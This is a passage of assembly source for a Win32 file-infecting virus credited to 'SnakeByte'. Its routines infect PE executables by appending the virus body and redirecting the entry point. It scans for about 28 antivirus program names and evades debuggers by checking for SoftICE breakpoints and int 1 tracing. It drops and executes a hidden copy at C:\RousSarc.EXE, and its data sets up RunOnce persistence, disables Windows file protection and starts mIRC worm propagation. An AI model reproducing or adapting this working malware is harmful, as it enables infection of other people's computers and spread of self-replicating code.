push 80000000h or 40000000h
|
|||
|
push esi ; Filename is in ESI
|
|||
|
call dword ptr [XCreateFileA]
|
|||
|
|
|||
|
inc eax
|
|||
|
jz Closed
|
|||
|
dec eax
|
|||
|
|
|||
|
mov dword ptr [FileHandle],eax
|
|||
|
mov ecx, dword ptr [WFD_nFileSizeLow]
|
|||
|
|
|||
|
CreateMap:
|
|||
|
push ecx
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
push 00000004h
|
|||
|
push eax
|
|||
|
push dword ptr [FileHandle]
|
|||
|
call dword ptr [XCreateFileMappingA]
|
|||
|
|
|||
|
mov dword ptr [MapHandle],eax
|
|||
|
|
|||
|
pop ecx ; Get Map-Site
|
|||
|
test eax, eax
|
|||
|
jz CloseFile ; Datei wieder...
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 2h
|
|||
|
push dword ptr [MapHandle]
|
|||
|
call dword ptr [XMapViewOfFile]
|
|||
|
|
|||
|
or eax,eax
|
|||
|
jz UnMapFile
|
|||
|
; EAX contains starting offset of the map
|
|||
|
mov dword ptr [MapAddress],eax
|
|||
|
clc
|
|||
|
ret
|
|||
|
|
|||
|
UnMapFile:
|
|||
|
call UnMapFile2
|
|||
|
|
|||
|
CloseFile:
|
|||
|
push dword ptr [FileHandle]
|
|||
|
call [XCloseHandle]
|
|||
|
|
|||
|
Closed:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
UnMapFile2:
|
|||
|
push dword ptr [MapAddress]
|
|||
|
call dword ptr [XUnmapViewOfFile]
|
|||
|
|
|||
|
push dword ptr [MapHandle]
|
|||
|
call dword ptr [XCloseHandle]
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; ---------------------[ Infection of the EXE-File ]-------------------------
|
|||
|
; ***************************************************************************
|
|||
|
|
|||
|
InfectEXE: ; MapAddress contains the start address of the file
|
|||
|
|
|||
|
mov ecx, [esi+3Ch] ; esi points to PE-Header
|
|||
|
; ecx = Alignment Faktor
|
|||
|
mov eax, dword ptr [WFD_nFileSizeLow]
|
|||
|
add eax, VirusSize
|
|||
|
|
|||
|
call Align
|
|||
|
mov dword ptr [NewSize], eax
|
|||
|
xchg ecx, eax
|
|||
|
|
|||
|
pushad
|
|||
|
call UnMapFile2 ; remap file
|
|||
|
popad
|
|||
|
|
|||
|
call CreateMap
|
|||
|
jc NoEXE
|
|||
|
; esi = PE-Header
|
|||
|
mov esi, dword ptr [eax+3Ch]
|
|||
|
|
|||
|
add esi, eax
|
|||
|
mov edi, esi ; edi = esi
|
|||
|
; eax = Sections
|
|||
|
; get last section
|
|||
|
movzx eax, word ptr [edi+06h]
|
|||
|
dec eax
|
|||
|
imul eax, eax, 28h
|
|||
|
add esi, eax
|
|||
|
add esi, 78h ; point to Directory Table
|
|||
|
|
|||
|
mov edx, [edi+74h] ; Get Directory Entrys
|
|||
|
shl edx, 3h
|
|||
|
add esi, edx
|
|||
|
; get EIP
|
|||
|
mov eax, [edi+28h]
|
|||
|
mov dword ptr [OldEIP], eax
|
|||
|
|
|||
|
; get Imagebase
|
|||
|
mov eax, [edi+34h]
|
|||
|
mov dword ptr [OldBase], eax
|
|||
|
|
|||
|
mov edx, [esi+10h] ; get size of RAW-Data
|
|||
|
mov ebx, edx
|
|||
|
add edx, [esi+14h] ; edx = points to raw-data
|
|||
|
push edx
|
|||
|
|
|||
|
mov eax, ebx
|
|||
|
add eax, [esi+0Ch] ; EAX contains now Start of our file
|
|||
|
; but we need to point it to the second part of the virus
|
|||
|
add eax, ( offset SecondPart - ImageBase ) - Gap1
|
|||
|
; the 0A00h are caused by the uninitialized data
|
|||
|
|
|||
|
mov [edi+28h], eax
|
|||
|
mov dword ptr [NewEIP], eax
|
|||
|
|
|||
|
mov eax, [esi+10h] ; enlarge Raw-Data
|
|||
|
push eax
|
|||
|
add eax, VirusSize ; VirusSize = Size of entire file
|
|||
|
mov ecx, [edi+3Ch] ; align it
|
|||
|
call Align
|
|||
|
|
|||
|
mov [esi+10h], eax ; save in file
|
|||
|
|
|||
|
pop eax ; new Virtual-Size
|
|||
|
add eax, VirusSize
|
|||
|
mov [esi+08h], eax
|
|||
|
|
|||
|
pop edx
|
|||
|
|
|||
|
mov eax, [esi+10h]
|
|||
|
add eax, [esi+0Ch] ; get new imagesize
|
|||
|
mov [edi+50h], eax
|
|||
|
; change the section flags
|
|||
|
or dword ptr [esi+24h], 0A0000020h
|
|||
|
; Write infection mark to file
|
|||
|
; --> A-AV ( Anti- Anti-Virus )
|
|||
|
mov dword ptr [edi+4Ch], 'VA-A'
|
|||
|
|
|||
|
xchg edi, edx
|
|||
|
|
|||
|
; save the start of the virus in file
|
|||
|
mov dword ptr [StartofVirusinFile], edi
|
|||
|
add edi, dword ptr [MapAddress]
|
|||
|
push edi
|
|||
|
|
|||
|
call OpenMyself
|
|||
|
; lets save the right Imagebase and EIP
|
|||
|
; inside our buffered file ;)
|
|||
|
|
|||
|
; Save EIP & Imagebase
|
|||
|
mov eax, dword ptr [OldEIP]
|
|||
|
lea edi, FileBuffer
|
|||
|
add edi, (offset retEIP - ImageBase) - Gap1
|
|||
|
stosd
|
|||
|
|
|||
|
mov eax, dword ptr [OldBase]
|
|||
|
lea edi, FileBuffer
|
|||
|
add edi, (offset retBas - ImageBase) - Gap1
|
|||
|
stosd
|
|||
|
|
|||
|
pop edi
|
|||
|
lea esi, FileBuffer
|
|||
|
mov ecx, VirusSize ; First Part
|
|||
|
rep movsb ; append
|
|||
|
; we need two steps, otherwise we would fill the
|
|||
|
|
|||
|
dec byte ptr [InfCounter]
|
|||
|
clc
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
NoEXE:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; -------------------------[ Open Us-Prozedur ]------------------------------
|
|||
|
; ***************************************************************************
|
|||
|
OpenMyself: ; this Procedure returns the start of
|
|||
|
; the current file in esi
|
|||
|
; first we need the filename
|
|||
|
pushad
|
|||
|
call dword ptr [XGetCommandLineA]
|
|||
|
inc eax
|
|||
|
mov dword ptr [CmdLine], eax
|
|||
|
|
|||
|
CommandReceive:
|
|||
|
cmp dword ptr [eax],'EXE.'
|
|||
|
je CommandOK
|
|||
|
inc eax
|
|||
|
jmp CommandReceive
|
|||
|
|
|||
|
CommandOK:
|
|||
|
add eax, 4h
|
|||
|
mov byte ptr [eax],0 ; CmdLine contains now a pointer
|
|||
|
; to the filename of our file
|
|||
|
mov esi, dword ptr [CmdLine]
|
|||
|
|
|||
|
xor eax,eax ; Open File
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 3h
|
|||
|
push eax
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
push 80000000h
|
|||
|
push esi ; Filename is in ESI
|
|||
|
call dword ptr [XCreateFileA]
|
|||
|
|
|||
|
mov ebx, eax ; save handle
|
|||
|
|
|||
|
push 0 ; load the file into the free memory
|
|||
|
push offset Read ; number of bytes read..
|
|||
|
push VirusSize ; read how many bytes ?
|
|||
|
push offset FileBuffer
|
|||
|
push eax
|
|||
|
call dword ptr [XReadFile]
|
|||
|
|
|||
|
push ebx
|
|||
|
call dword ptr [XCloseHandle]
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
Read dd ?
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; -----------------------[ Check if we got an AV ]---------------------------
|
|||
|
; ***************************************************************************
|
|||
|
AVNameCheck: ; pointer to name is in esi
|
|||
|
pushad ; save all registers
|
|||
|
|
|||
|
lea edi, NameBuffer ; we transfer the name to a buffer
|
|||
|
xor ecx, ecx
|
|||
|
|
|||
|
NameCheckLoop:
|
|||
|
cmp byte ptr [esi], 0 ; check if we are at the end
|
|||
|
je NameTransferred
|
|||
|
lodsb ; get first letter
|
|||
|
cmp al, 96d
|
|||
|
jb StoreLetter
|
|||
|
sub al, 32d ; convert to uppercase
|
|||
|
|
|||
|
StoreLetter:
|
|||
|
stosb
|
|||
|
inc ecx
|
|||
|
jmp NameCheckLoop
|
|||
|
|
|||
|
NameTransferred: ; nothing found .. :(
|
|||
|
cmp ecx, 0
|
|||
|
je EndNameCheck
|
|||
|
mov dword ptr [NameLen], ecx
|
|||
|
|
|||
|
mov edx, 28d ; Number of AV-Names we check
|
|||
|
lea esi, AVNames ; Pointer to the names
|
|||
|
lea ebp, AVLenght
|
|||
|
CheckLoop:
|
|||
|
call NameCheck ; Procedure to check this name
|
|||
|
jc WeGotAvName ; if Carriage Flag is set we got one
|
|||
|
dec edx ; otherwise we search on, until edx = 0
|
|||
|
jz EndNameCheck
|
|||
|
|
|||
|
xor eax, eax
|
|||
|
mov al, byte ptr [ebp] ; increase esi
|
|||
|
mov esi, dword ptr [NameESI2]
|
|||
|
add esi, eax
|
|||
|
inc ebp
|
|||
|
jmp CheckLoop
|
|||
|
|
|||
|
EndNameCheck: ; We found nothing :)
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
WeGotAvName: ; We found a dirty AV :(
|
|||
|
popad
|
|||
|
xor esi, esi ; ESI = 0 as flag
|
|||
|
ret
|
|||
|
|
|||
|
NameCheck: ; ECX contains the size of the search area
|
|||
|
; ESI points to av name
|
|||
|
; EDI points to filename
|
|||
|
mov dword ptr [NameESI2], esi
|
|||
|
mov ecx, dword ptr [NameLen]
|
|||
|
lea edi, NameBuffer ; here we search for the Name
|
|||
|
mov al, byte ptr [esi] ; get first byte into al..
|
|||
|
|
|||
|
mov dword ptr [NameESI], esi ; avname
|
|||
|
mov dword ptr [NameEDI], edi ; filename
|
|||
|
|
|||
|
SearchOn:
|
|||
|
mov esi, dword ptr [NameESI] ; avname
|
|||
|
mov edi, dword ptr [NameEDI]
|
|||
|
|
|||
|
repnz scasb ; start search
|
|||
|
cmp ecx,0
|
|||
|
jz NoAV
|
|||
|
|
|||
|
mov dword ptr [NameESI], esi
|
|||
|
dec edi
|
|||
|
mov dword ptr [NameEDI], edi
|
|||
|
|
|||
|
Compare: ; compare the rest of the string
|
|||
|
xor ecx, ecx
|
|||
|
mov cl, byte ptr [ebp] ; points to stringlenght
|
|||
|
Compare2:
|
|||
|
repz cmpsb
|
|||
|
jc Compare2
|
|||
|
cmp ecx,0
|
|||
|
jz Found
|
|||
|
|
|||
|
NoAV:
|
|||
|
ret
|
|||
|
|
|||
|
Found: ; We got a dirty AV :P
|
|||
|
stc ; set flag
|
|||
|
ret
|
|||
|
|
|||
|
NameLen dd 0h ; Size of the filename
|
|||
|
NameESI dd 0h ; Pointer to av name
|
|||
|
NameEDI dd 0h ; Pointer to filename
|
|||
|
NameESI2 dd 0h ; Pointer to av name
|
|||
|
|
|||
|
; Table with names of AV-File we don't start
|
|||
|
AVNames:
|
|||
|
db 'AVPM' ; AVP Names
|
|||
|
db 'AVP32'
|
|||
|
db 'AVPCC'
|
|||
|
db 'AVPTC'
|
|||
|
db '_AVPM'
|
|||
|
db '_AVP32'
|
|||
|
db '_AVPCC'
|
|||
|
db 'AVPDOS'
|
|||
|
|
|||
|
db 'AVE32' ; Anti-Vir
|
|||
|
db 'AVGCTRL'
|
|||
|
db 'AVWIN95'
|
|||
|
|
|||
|
db 'SCAN32' ; DR-Solomon
|
|||
|
db 'AVCONSOL'
|
|||
|
db 'VSHWIN32'
|
|||
|
|
|||
|
db 'FP-WIN' ; F-Prot
|
|||
|
db 'F-STOPW'
|
|||
|
|
|||
|
db 'DVP95' ; F-Secure
|
|||
|
db 'F-AGNT95'
|
|||
|
db 'F-PROT95'
|
|||
|
|
|||
|
db 'VET95' ; InnoculateIT
|
|||
|
db 'VETTRAY'
|
|||
|
|
|||
|
db 'CLAW95' ; Norman Virus Control
|
|||
|
db 'NVC95'
|
|||
|
|
|||
|
db 'NAVAPW32' ; Norton
|
|||
|
db 'NAVW32'
|
|||
|
|
|||
|
db 'SWEEP95' ; Sophos
|
|||
|
|
|||
|
db 'IOMON98' ; PC-Cillin
|
|||
|
db 'PCCWIN98'
|
|||
|
|
|||
|
db 'MONITOR' ; RAV
|
|||
|
db 'RAW7WIN'
|
|||
|
|
|||
|
AVLenght:
|
|||
|
db 4d, 5d, 5d, 5d, 5d, 6d, 6d, 6d ; AVP
|
|||
|
db 5d, 7d, 7d ; ANTI-Vir
|
|||
|
db 6d, 8d, 8d ; DR-Solomon
|
|||
|
db 6d, 7d ; F-PROT
|
|||
|
db 5d, 8d, 8d ; F-Secure
|
|||
|
db 5d, 7d ; Innoculate-IT
|
|||
|
db 6d, 5d ; Norman
|
|||
|
db 8d, 6d ; Norton
|
|||
|
db 7d ; Sophos
|
|||
|
db 7d, 8d ; PC-Cillin
|
|||
|
db 7d, 7d ; RAV
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; --------------------------[ Align-Prozedur ]-------------------------------
|
|||
|
; ***************************************************************************
|
|||
|
; eax - Size
|
|||
|
; ecx - base
|
|||
|
Align:
|
|||
|
push edx
|
|||
|
xor edx, edx
|
|||
|
push eax
|
|||
|
div ecx
|
|||
|
pop eax
|
|||
|
sub ecx, edx
|
|||
|
add eax, ecx
|
|||
|
pop edx ; eax - New Size
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; --------------------------[ FindFile Prozeduren ]--------------------------
|
|||
|
; ***************************************************************************
|
|||
|
|
|||
|
; Search for files
|
|||
|
FindFirstFileProc:
|
|||
|
call ClearFindData
|
|||
|
lea eax, WIN32_FIND_DATA
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
call dword ptr [XFindFirstFileA]
|
|||
|
mov dword ptr [FindHandle], eax
|
|||
|
ret
|
|||
|
|
|||
|
FindNextFileProc:
|
|||
|
call ClearFindData
|
|||
|
lea eax, WIN32_FIND_DATA
|
|||
|
push eax
|
|||
|
mov eax, dword ptr [FindHandle]
|
|||
|
push eax
|
|||
|
call dword ptr [XFindNextFileA]
|
|||
|
ret
|
|||
|
|
|||
|
ClearFindData:
|
|||
|
lea edi, WFD_szFileName
|
|||
|
mov ecx, 276d ; clear old data
|
|||
|
xor eax, eax
|
|||
|
rep stosb
|
|||
|
ret
|
|||
|
|
|||
|
;****************************************************************************
|
|||
|
;-----------------------------[ PE / MZ Check ]------------------------------
|
|||
|
;****************************************************************************
|
|||
|
; Check MZ and PE - Signs
|
|||
|
CheckPESign:
|
|||
|
cmp dword ptr [edi], 'FP' ; greater or equal to "PF"
|
|||
|
jae NoPESign
|
|||
|
|
|||
|
cmp dword ptr [edi], 'DP' ; lower or equal to "PD"
|
|||
|
jbe NoPESign
|
|||
|
|
|||
|
clc ; all left is "PE"
|
|||
|
ret
|
|||
|
|
|||
|
NoPESign:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
CheckMZSign:
|
|||
|
|
|||
|
cmp word ptr [esi], '[M'
|
|||
|
jae NoPESign
|
|||
|
|
|||
|
cmp word ptr [esi], 'YM'
|
|||
|
jbe NoPESign
|
|||
|
|
|||
|
clc
|
|||
|
ret
|
|||
|
ret
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; ----------------[ This is the host for the EXE-Virus Part ]----------------
|
|||
|
; ***************************************************************************
|
|||
|
|
|||
|
FirstGenHost:
|
|||
|
push 0h ; stop this !
|
|||
|
call ExitProcess
|
|||
|
jmp FirstGenHost
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;
|
|||
|
; \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
; ////////////////////////////////////////////////////////////////////////////\
|
|||
|
; ###########################################################################/\
|
|||
|
; ------------------[ This is the second part of the Virus ]-----------------/\
|
|||
|
; ###########################################################################/\
|
|||
|
; ////////////////////////////////////////////////////////////////////////////\
|
|||
|
; \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
;
|
|||
|
|
|||
|
SecondPart:
|
|||
|
; Here do we drop the entire file from the
|
|||
|
; infected goat and execute it
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; -------------------------[ Search for Kernel ]-----------------------------
|
|||
|
; ***************************************************************************
|
|||
|
|
|||
|
|
|||
|
call Delta
|
|||
|
|
|||
|
Delta:
|
|||
|
pop ebp
|
|||
|
sub ebp, offset Delta
|
|||
|
|
|||
|
mov esi, [esp] ; get Create Process API
|
|||
|
xor si, si
|
|||
|
|
|||
|
call GetKernel ; Search for kernel
|
|||
|
jnc GetApis ; If we got it we carry on..
|
|||
|
jmp ExecuteHost
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; --------------------[ Search-Kernel Procedure ]----------------------------
|
|||
|
; ***************************************************************************
|
|||
|
|
|||
|
GetKernel:
|
|||
|
mov byte ptr [ebp+K32Trys], 5h
|
|||
|
|
|||
|
GK1:
|
|||
|
cmp byte ptr [ebp+K32Trys], 00h
|
|||
|
jz NoKernel ; did we pass the limit ?
|
|||
|
|
|||
|
call CheckMZSign ; Check for exe-stub
|
|||
|
jnc CheckPE
|
|||
|
|
|||
|
GK2:
|
|||
|
sub esi, 10000h ; search next page
|
|||
|
dec byte ptr [ebp+K32Trys]
|
|||
|
jmp GK1 ; test again
|
|||
|
|
|||
|
CheckPE: ; test for PE-Header
|
|||
|
mov edi, [esi+3Ch]
|
|||
|
add edi, esi
|
|||
|
call CheckPESign
|
|||
|
|
|||
|
jnc CheckDLL ; check dll-sign
|
|||
|
jmp GK2
|
|||
|
|
|||
|
CheckDLL:
|
|||
|
add edi, 16h
|
|||
|
mov bx, word ptr [edi] ; get characteristics
|
|||
|
and bx, 0F000h ; to check for dll flag
|
|||
|
cmp bx, 02000h
|
|||
|
jne GK2
|
|||
|
|
|||
|
KernelFound: ; We got it !
|
|||
|
sub edi, 16h ; edi = PE-Header
|
|||
|
xchg eax, edi ; eax = PE offset
|
|||
|
xchg ebx, esi ; ebx = MZ offset
|
|||
|
clc ; clear carriage flag
|
|||
|
ret
|
|||
|
|
|||
|
NoKernel:
|
|||
|
stc ; set carriage flag if we did not found it
|
|||
|
ret
|
|||
|
|
|||
|
K32Trys db 5h ; search range
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; ---------------------------[ Search for API's ]----------------------------
|
|||
|
; ***************************************************************************
|
|||
|
|
|||
|
|
|||
|
; we search for LoadLibaryA and GetProcAddress
|
|||
|
; in the kernel to get the other API's
|
|||
|
|
|||
|
LL db 'LoadLibraryA', 0h
|
|||
|
GPA db 'GetProcAddress', 0h
|
|||
|
|
|||
|
GetApis: ; offset of Kernel32.dll PE-headers in eax
|
|||
|
|
|||
|
mov [ebp+KernelAddy], eax ; save
|
|||
|
mov [ebp+MZAddy], ebx
|
|||
|
|
|||
|
lea edx, [ebp+LL] ; Point to LoadLibaryA - API
|
|||
|
mov ecx, 0Ch ; size of name
|
|||
|
call SearchAPI1 ; search it
|
|||
|
mov [ebp+XLoadLibraryA], eax
|
|||
|
; save offset
|
|||
|
|
|||
|
xchg eax, ecx ; if we did not get it, we can't go on
|
|||
|
jecxz ExecuteHost
|
|||
|
|
|||
|
lea edx, [ebp+GPA] ; Name of GetProcAddress - API
|
|||
|
mov ecx, 0Eh ; size
|
|||
|
call SearchAPI1
|
|||
|
mov [ebp+XGetProcAddress], eax
|
|||
|
|
|||
|
xchg eax, ecx ; check if we got it
|
|||
|
jecxz ExecuteHost
|
|||
|
|
|||
|
|
|||
|
GetAPI2: ; locate all other apis now
|
|||
|
lea eax, [ebp+KERNEL32]
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+XLoadLibraryA]
|
|||
|
mov [ebp+K32Handle], eax
|
|||
|
test eax, eax
|
|||
|
jz ExecuteHost
|
|||
|
|
|||
|
lea esi, [ebp+Kernel32Names2]
|
|||
|
lea edi, [ebp+YCreateFileA]
|
|||
|
mov ebx, [ebp+K32Handle]
|
|||
|
push NumberOf2Kernel32APIS
|
|||
|
pop ecx
|
|||
|
call GetAPI3
|
|||
|
jmp DropIT ; let's do something serious ;)
|
|||
|
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; --------[ Search the kernel export table for the 2 main API's ]------------
|
|||
|
; ***************************************************************************
|
|||
|
|
|||
|
|
|||
|
SearchAPI1:
|
|||
|
and word ptr [ebp+counter], 0h
|
|||
|
|
|||
|
mov eax, [ebp+KernelAddy] ; get PE-Header offset
|
|||
|
|
|||
|
mov esi, [eax+78h] ; get Export Table Address
|
|||
|
add esi, [ebp+MZAddy]
|
|||
|
add esi, 1Ch
|
|||
|
|
|||
|
lodsd ; get address table
|
|||
|
add eax, [ebp+MZAddy]
|
|||
|
mov dword ptr [ebp+ATableVA], eax
|
|||
|
|
|||
|
lodsd ; get pointer table
|
|||
|
add eax, [ebp+MZAddy]
|
|||
|
mov dword ptr [ebp+NTableVA], eax
|
|||
|
|
|||
|
lodsd ; Ordinal Table
|
|||
|
add eax, [ebp+MZAddy]
|
|||
|
mov dword ptr [ebp+OTableVA], eax
|
|||
|
|
|||
|
mov esi, [ebp+NTableVA] ; get Name Pointer Table
|
|||
|
|
|||
|
SearchNextApi1:
|
|||
|
push esi
|
|||
|
lodsd
|
|||
|
add eax, [ebp+MZAddy]
|
|||
|
|
|||
|
mov esi, eax
|
|||
|
mov edi, edx
|
|||
|
push ecx
|
|||
|
|
|||
|
cld
|
|||
|
rep cmpsb ; check for api name
|
|||
|
pop ecx
|
|||
|
jz FoundApi1
|
|||
|
|
|||
|
pop esi ; get next API-Name
|
|||
|
add esi, 4h
|
|||
|
inc word ptr [ebp+counter]
|
|||
|
cmp word ptr [ebp+counter], 2000h
|
|||
|
je NotFoundApi1 ; if we checked more than 2000 API's we stop
|
|||
|
jmp SearchNextApi1 ; check next
|
|||
|
|
|||
|
FoundApi1:
|
|||
|
pop esi
|
|||
|
movzx eax, word ptr [ebp+counter]
|
|||
|
shl eax, 1h ; get right entry
|
|||
|
|
|||
|
add eax, dword ptr [ebp+OTableVA]
|
|||
|
xor esi, esi ; clear esi --> eax
|
|||
|
xchg eax, esi
|
|||
|
lodsw
|
|||
|
shl eax, 2h
|
|||
|
add eax, dword ptr [ebp+ATableVA]
|
|||
|
mov esi, eax ; get RVA
|
|||
|
lodsd ; eax = Adress RVA
|
|||
|
add eax, [ebp+MZAddy]
|
|||
|
|
|||
|
ret ; API offset in eax
|
|||
|
|
|||
|
NotFoundApi1:
|
|||
|
xor eax, eax ; we failed :(
|
|||
|
ret
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; ----------------------[ Let's drop the virus to a file ]-------------------
|
|||
|
; ***************************************************************************
|
|||
|
DropIT:
|
|||
|
|
|||
|
push 0
|
|||
|
push 080h ; normal
|
|||
|
push 1 ; new file
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 40000000h ; write access
|
|||
|
lea eax, [ebp+HiddenFile]
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+YCreateFileA]
|
|||
|
|
|||
|
xchg eax, ebx ; Handle in ebx
|
|||
|
|
|||
|
mov esi, ebp
|
|||
|
add esi, ImageBase + Gap1 ; uninitialised data once again ;)
|
|||
|
|
|||
|
push 0 ; overlapped
|
|||
|
lea ecx, [ebp+Write] ; written bytes
|
|||
|
push ecx
|
|||
|
push VirusSize ; Lenght
|
|||
|
push esi ; Start of Data
|
|||
|
push ebx ; File Handle
|
|||
|
Call dword ptr [ebp+YWriteFile]
|
|||
|
|
|||
|
push ebx
|
|||
|
call dword ptr [ebp+YCloseHandle]
|
|||
|
|
|||
|
|
|||
|
xor eax, eax ; let's execute the virus
|
|||
|
lea esi, [ebp+ProcessInformation]
|
|||
|
push esi
|
|||
|
lea esi, [ebp+StartupInfo]
|
|||
|
push esi
|
|||
|
push eax ; lpCurrentDirectory
|
|||
|
push eax ; lpEnvironment
|
|||
|
push eax ; Create_New_Process_Group & Normal_Priority_Class
|
|||
|
push eax ; bInheritHandles
|
|||
|
push eax ; lpThreadAttributes
|
|||
|
push eax ; lpProcessAttributes
|
|||
|
lea esi, [ebp+HiddenFile]
|
|||
|
push esi ; filename with commandline
|
|||
|
push eax ; command line
|
|||
|
call dword ptr [XCreateProcessA]
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; -----------------------[ open original program ]---------------------------
|
|||
|
; ***************************************************************************
|
|||
|
|
|||
|
ExecuteHost:
|
|||
|
|
|||
|
mov eax,12345678h ; get back to old Imagebase+EIP
|
|||
|
org $-4
|
|||
|
retEIP dd 0h
|
|||
|
|
|||
|
add eax,12345678h
|
|||
|
org $-4
|
|||
|
retBas dd 0h
|
|||
|
|
|||
|
jmp eax
|
|||
|
|
|||
|
OldEIP dd 0h
|
|||
|
OldBase dd 0h
|
|||
|
|
|||
|
NewEIP dd 0h
|
|||
|
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; --------------[ use GetProcAddress to retrieve API's ]---------------------
|
|||
|
; ***************************************************************************
|
|||
|
; this procedure is used in both parts of the virus !
|
|||
|
; esi point to the names
|
|||
|
; edi to the place where we save the offsets
|
|||
|
; ebx contains module handle
|
|||
|
; ecx got the number of api's
|
|||
|
GetAPI3:
|
|||
|
push ecx ; save number
|
|||
|
|
|||
|
push esi ; push Api-name
|
|||
|
push ebx ; push Module-Handle
|
|||
|
; call GetProcAddress
|
|||
|
cmp ebp, 'VA-A' ; if we are in the exe-part, we can call
|
|||
|
je API3b ; the api directly
|
|||
|
|
|||
|
pushad ; check for int 1h tracing
|
|||
|
push eax ; int 1h tracing destroys the stack, so we will see
|
|||
|
pop eax ; if it is destroyed
|
|||
|
sub esp, 4d
|
|||
|
pop ecx
|
|||
|
cmp eax, ecx
|
|||
|
jne EndApi3
|
|||
|
popad
|
|||
|
|
|||
|
API3a: ; otherwise we need the one found in the kernel
|
|||
|
call dword ptr [ebp+XGetProcAddress]
|
|||
|
jmp API3c
|
|||
|
|
|||
|
API3b:
|
|||
|
call GetProcAddress
|
|||
|
|
|||
|
API3c:
|
|||
|
stosd ; save offset
|
|||
|
|
|||
|
pushad
|
|||
|
cmp eax, 0 ; Lets do a check for Softice Breakpoints
|
|||
|
je NoSICheck
|
|||
|
cmp byte ptr [eax], 0CCh ; check for the breakpoint
|
|||
|
je EndApi3 ; due to the pushad, we will ret somewhere strange ;)
|
|||
|
NoSICheck:
|
|||
|
popad
|
|||
|
|
|||
|
pop ecx
|
|||
|
dec ecx
|
|||
|
jz EndApi3
|
|||
|
|
|||
|
push ecx ; point to next name
|
|||
|
|
|||
|
SearchZero:
|
|||
|
cmp byte ptr [esi], 0h
|
|||
|
je GotZero
|
|||
|
inc esi
|
|||
|
jmp SearchZero
|
|||
|
|
|||
|
GotZero:
|
|||
|
inc esi
|
|||
|
pop ecx
|
|||
|
jmp GetAPI3 ; get next api
|
|||
|
|
|||
|
EndApi3:
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
; ###########################################################################
|
|||
|
; ----------------------[ Third Part - The Data ]----------------------------
|
|||
|
; ###########################################################################
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; ---------------------[ Data of the second part ]---------------------------
|
|||
|
; ***************************************************************************
|
|||
|
|
|||
|
NumberOf2Kernel32APIS equ 4
|
|||
|
|
|||
|
Kernel32Names2:
|
|||
|
db 'CreateFileA', 0
|
|||
|
db 'CloseHandle', 0
|
|||
|
db 'WriteFile',0
|
|||
|
db 'CreateProcessA',0
|
|||
|
|
|||
|
HiddenFile db 'C:\RousSarc.EXE',0 ; Rous Sarkoma is a well known Retro Virus
|
|||
|
KERNEL32 db 'kernel32.dll',0 ; kernel32.dll .. :)
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; ---------------------------[ Some Data ]-----------------------------------
|
|||
|
; ***************************************************************************
|
|||
|
VirusEnd:
|
|||
|
|
|||
|
K32Handle dd (?) ; Hier speichern wir das Handle der Kernel32.dll
|
|||
|
|
|||
|
XLoadLibraryA dd (?) ; Hier die Offsets der ersten beiden API's
|
|||
|
XGetProcAddress dd (?)
|
|||
|
|
|||
|
; API's we need for the second part
|
|||
|
YCreateFileA dd (?)
|
|||
|
YCloseHandle dd (?)
|
|||
|
YWriteFile dd (?)
|
|||
|
YCreateProcessA dd (?)
|
|||
|
|
|||
|
StartofVirusinFile dd 0h
|
|||
|
Write dd 0h
|
|||
|
|
|||
|
; Daten f<>r die Kernel-Suche
|
|||
|
KernelAddy dd (?) ; PE-Header
|
|||
|
MZAddy dd (?) ; MZ-Header
|
|||
|
counter dw (?) ; Wie viele Namen haben wir getestet
|
|||
|
|
|||
|
ATableVA dd (?) ; Address Table VA
|
|||
|
NTableVA dd (?) ; Name Pointer Table VA
|
|||
|
OTableVA dd (?) ; Name Pointer Table VA
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; --------------------[ Initialized First Part Data ]------------------------
|
|||
|
; ***************************************************************************
|
|||
|
|
|||
|
.DATA
|
|||
|
CopyRight db 'Win32.RousSarcoma by SnakeByte',0
|
|||
|
|
|||
|
_2kProt db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
|
|||
|
_2kProtValue db 'SfcDisable',0
|
|||
|
RunOnceName db '\RousSarc.EXE',0
|
|||
|
RunOnceKey db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',0
|
|||
|
|
|||
|
filemask db '*.EXE', 0 ; get exe-files
|
|||
|
|
|||
|
; Data for mIRC Worming
|
|||
|
MIRCscript db '[script]',13d,10d
|
|||
|
